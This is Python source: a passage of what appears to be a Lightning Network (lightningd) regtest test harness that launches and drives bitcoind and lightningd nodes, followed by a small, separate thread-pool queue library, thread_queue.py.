# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, may_fail=False,
may_reconnect=False, allow_broken_log=False,
allow_bad_gossip=False, db=None, port=None, disconnect=None, random_hsm=None, options=None, **kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = LightningRpc(socket_path, self.executor)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if VALGRIND:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount, announce=announce_channel)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
def wait_for_htlcs(self):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory, db_provider, node_cls):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip'
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, **kwargs):
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, db=db,
port=port, options=options, **kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start(wait_for_bitcoind_sync)
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*openingd-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
thread_queue.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
from threading import Thread
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
__author__ = 'Tim Martin'
__email__ = 'tim@timmartin.me'
__version__ = '0.2.2'
LOG = logging.getLogger(__name__)
t = Thread()
class QueueNotEmptyException(Exception):
"""
Raised when items from the queue have not
been processed, likely due to an error in
the underlying threads
"""
def __init__(self, message, items, exceptions):
self._unattempted_tasks = items
self.thread_exceptions = exceptions
super(QueueNotEmptyException, self).__init__(message)
@property
def all_unprocessed_tasks(self):
tasks = list(self.unattempted_tasks)
thread_task_excs = [exc.task for exc in self.thread_exceptions
if isinstance(exc, ThreadTaskException) and exc.task is not None]
return tasks + thread_task_excs
@property
def unattempted_tasks(self):
return [task for task in self._unattempted_tasks if task is not None]
class ThreadTaskException(Exception):
"""
Wrapper for exceptions that occur within the
underlying threads
"""
def __init__(self, message, exc, task=None):
self.__cause__ = exc
self.task = task
super(ThreadTaskException, self).__init__(message)
class ThreadQueue(object):
"""
An object for safely processing a queue
using a fixed number of threads
Example:
..code-block:: python
from thread_queue import ThreadQueue
def worker(arg, keyword=5):
print('arg = {0}, keyword = {1}'.format(arg, keyword))
with ThreadQueue(worker) as tq:
for i in range(10):
tq.load(i, i*10)
# Would print in no particular order (because it's threaded)
# arg = 0, keyword = 0
# arg = 1, keyword = 10
# arg = 2, keyword = 20
# ...
# arg = 9, keyword = 90
"""
def __init__(self, worker,
thread_count=10,
initialize_thread=None,
initialization_args=None,
initialization_kwargs=None,
cleanup_thread=None,
queue=None,
response_queue=None):
"""
:param function worker: The function to call from the
generated threads. This will take the same arguments
as are added to the ``ThreadQueue.load`` method. If you
call ``ThreadQueue(my_job).load(1, keyword=2)`` this
function would be effectively equivalent to calling
``my_job(1, keyword=2)``. The one caveat is if
``initialize_thread`` is set. In that case the return
value will be prepended to the arguments.
``ThreadQueue(my_job, initialize_thread=lambda: 'initial').load(1, keyword=2)``
is equivalent to ``my_job('initial', 1, keyword=2)
:param int thread_count: The number of threads to instantiate
:param function initialize_thread: A function to call immediately
after a thread has been initialized. The return value will
be prepended to the args sent to worker
:param tuple initialization_args: Arguments to pass to the ``initialize_thread``
function
:param dict initialization_kwargs: Keyword arguments to pass to
``initialize_thread``
:param function cleanup_thread: Called when the thread is about
to finish. It will always be called even in the event of an exception.
If ``initialize_thread`` is set, then the return value of that function
will be passed to ``cleanup_thread``
:param Queue queue: Defaults to ``queue.Queue()``. An
object that implements a ``Queue`` like interface.
It must include at least ``get``, ``put``, and ``join``
methods.
"""
self.thread_count = thread_count
self._queue = queue or Queue()
self.response_queue = queue or Queue()
self._exc_queue = None
self.initialize_thread = initialize_thread
self.worker = worker
self.initialization_args = initialization_args or []
self.initialization_kwargs = initialization_kwargs or {}
self.cleanup_thread = cleanup_thread
self._threads = []
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def start(self):
"""
Initializes the threads that the queue will be using
"""
LOG.debug('Starting ThreadQueue threads')
self._exc_queue = Queue()
for i in range(self.thread_count):
worker_args = [self._queue, self.initialize_thread,
self.worker, self.initialization_args,
self.initialization_kwargs, self.cleanup_thread,
self._exc_queue, self.response_queue]
thread = Thread(target=_do_work, args=worker_args)
thread.start()
self._threads.append(thread)
def load(self, *args, **kwargs):
"""
Loads a set of arguments to pass to the threads
via the queue. The arguments will be passed to
the ``worker`` function exactly as specified here unless
``initiliaze_thread`` is set. In which case, the return
value from initialize_thread will be prepended to the arguments
:param tuple args:
:param dict kwargs:
"""
self._queue.put(tuple([args, kwargs]))
def close(self):
"""
Waits for the queue to empty and then
joins the threads
"""
for i in range(self.thread_count):
self._queue.put(None)
for thread in self._threads:
thread.join()
